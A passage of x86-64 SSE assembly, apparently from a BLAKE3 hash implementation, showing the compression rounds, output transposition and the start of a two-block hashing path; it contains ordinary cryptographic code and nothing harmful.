pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x70]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0x30]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x40]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0x50]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x80]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xC0]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0xF0]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xD0]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0xA0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x70]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x20]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x10]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x90]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0x80]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xE0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0xC0]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xD0]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0x20]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x30]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0x60]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xB0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0x10]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xF0]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0x90]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xE0]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x30]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xA0]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x40]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
pxor xmm0, xmm8
pxor xmm1, xmm9
pxor xmm2, xmm10
pxor xmm3, xmm11
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
pxor xmm4, xmm12
pxor xmm5, xmm13
pxor xmm6, xmm14
pxor xmm7, xmm15
mov eax, r13d
jne 9b
movdqa xmm9, xmm0
punpckldq xmm0, xmm1
punpckhdq xmm9, xmm1
movdqa xmm11, xmm2
punpckldq xmm2, xmm3
punpckhdq xmm11, xmm3
movdqa xmm1, xmm0
punpcklqdq xmm0, xmm2
punpckhqdq xmm1, xmm2
movdqa xmm3, xmm9
punpcklqdq xmm9, xmm11
punpckhqdq xmm3, xmm11
movdqu xmmword ptr [rbx], xmm0
movdqu xmmword ptr [rbx+0x20], xmm1
movdqu xmmword ptr [rbx+0x40], xmm9
movdqu xmmword ptr [rbx+0x60], xmm3
movdqa xmm9, xmm4
punpckldq xmm4, xmm5
punpckhdq xmm9, xmm5
movdqa xmm11, xmm6
punpckldq xmm6, xmm7
punpckhdq xmm11, xmm7
movdqa xmm5, xmm4
punpcklqdq xmm4, xmm6
punpckhqdq xmm5, xmm6
movdqa xmm7, xmm9
punpcklqdq xmm9, xmm11
punpckhqdq xmm7, xmm11
movdqu xmmword ptr [rbx+0x10], xmm4
movdqu xmmword ptr [rbx+0x30], xmm5
movdqu xmmword ptr [rbx+0x50], xmm9
movdqu xmmword ptr [rbx+0x70], xmm7
movdqa xmm1, xmmword ptr [rsp+0x110]
movdqa xmm0, xmm1
paddd xmm1, xmmword ptr [rsp+0x150]
movdqa xmmword ptr [rsp+0x110], xmm1
pxor xmm0, xmmword ptr [CMP_MSB_MASK+rip]
pxor xmm1, xmmword ptr [CMP_MSB_MASK+rip]
pcmpgtd xmm0, xmm1
movdqa xmm1, xmmword ptr [rsp+0x120]
psubd xmm1, xmm0
movdqa xmmword ptr [rsp+0x120], xmm1
add rbx, 128
add rdi, 32
sub rsi, 4
cmp rsi, 4
jnc 2b
test rsi, rsi
jnz 3f
4:
mov rsp, rbp
pop rbp
pop rbx
pop r12
pop r13
pop r14
pop r15
ret
.p2align 5
3:
test esi, 0x2
je 3f
movups xmm0, xmmword ptr [rcx]
movups xmm1, xmmword ptr [rcx+0x10]
movaps xmm8, xmm0
movaps xmm9, xmm1
movd xmm13, dword ptr [rsp+0x110]
movd xmm14, dword ptr [rsp+0x120]
punpckldq xmm13, xmm14
movaps xmmword ptr [rsp], xmm13
movd xmm14, dword ptr [rsp+0x114]
movd xmm13, dword ptr [rsp+0x124]
punpckldq xmm14, xmm13
movaps xmmword ptr [rsp+0x10], xmm14
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
movaps xmm10, xmm2
movups xmm4, xmmword ptr [r8+rdx-0x40]
movups xmm5, xmmword ptr [r8+rdx-0x30]
movaps xmm3, xmm4
shufps xmm4, xmm5, 136
shufps xmm3, xmm5, 221
movaps xmm5, xmm3
movups xmm6, xmmword ptr [r8+rdx-0x20]
movups xmm7, xmmword ptr [r8+rdx-0x10]
movaps xmm3, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm3, xmm7, 221
pshufd xmm7, xmm3, 0x93
movups xmm12, xmmword ptr [r9+rdx-0x40]
movups xmm13, xmmword ptr [r9+rdx-0x30]
movaps xmm11, xmm12
shufps xmm12, xmm13, 136
shufps xmm11, xmm13, 221
movaps xmm13, xmm11
movups xmm14, xmmword ptr [r9+rdx-0x20]
movups xmm15, xmmword ptr [r9+rdx-0x10]
movaps xmm11, xmm14
shufps xmm14, xmm15, 136
pshufd xmm14, xmm14, 0x93
shufps xmm11, xmm15, 221
pshufd xmm15, xmm11, 0x93
shl rax, 0x20
or rax, 0x40
movq xmm3, rax
movdqa xmmword ptr [rsp+0x20], xmm3
movaps xmm3, xmmword ptr [rsp]
movaps xmm11, xmmword ptr [rsp+0x10]
punpcklqdq xmm3, xmmword ptr [rsp+0x20]
punpcklqdq xmm11, xmmword ptr [rsp+0x20]
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm8, xmm12
movaps xmmword ptr [rsp+0x20], xmm4
movaps xmmword ptr [rsp+0x30], xmm12
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
pshuflw xmm11, xmm11, 0xB1
pshufhw xmm11, xmm11, 0xB1
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 20
psrld xmm4, 12
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 20
psrld xmm4, 12
por xmm9, xmm4
paddd xmm0, xmm5
paddd xmm8, xmm13
movaps xmmword ptr [rsp+0x40], xmm5
movaps xmmword ptr [rsp+0x50], xmm13
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
movdqa xmm13, xmm3
psrld xmm3, 8
pslld xmm13, 24
pxor xmm3, xmm13
movdqa xmm13, xmm11
psrld xmm11, 8
pslld xmm13, 24
pxor xmm11, xmm13
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 25
psrld xmm4, 7
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 25
psrld xmm4, 7
por xmm9, xmm4
pshufd xmm0, xmm0, 0x93
pshufd xmm8, xmm8, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm11, xmm11, 0x4E
pshufd xmm2, xmm2, 0x39
pshufd xmm10, xmm10, 0x39
paddd xmm0, xmm6
paddd xmm8, xmm14
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
pshuflw xmm11, xmm11, 0xB1
pshufhw xmm11, xmm11, 0xB1
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 20
psrld xmm4, 12
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 20
psrld xmm4, 12
por xmm9, xmm4
paddd xmm0, xmm7
paddd xmm8, xmm15
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
movdqa xmm13, xmm3
psrld xmm3, 8
pslld xmm13, 24
pxor xmm3, xmm13
movdqa xmm13, xmm11
psrld xmm11, 8
pslld xmm13, 24
pxor xmm11, xmm13
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 25
psrld xmm4, 7
por xmm1, xmm4
movdqa xmm4, xmm9
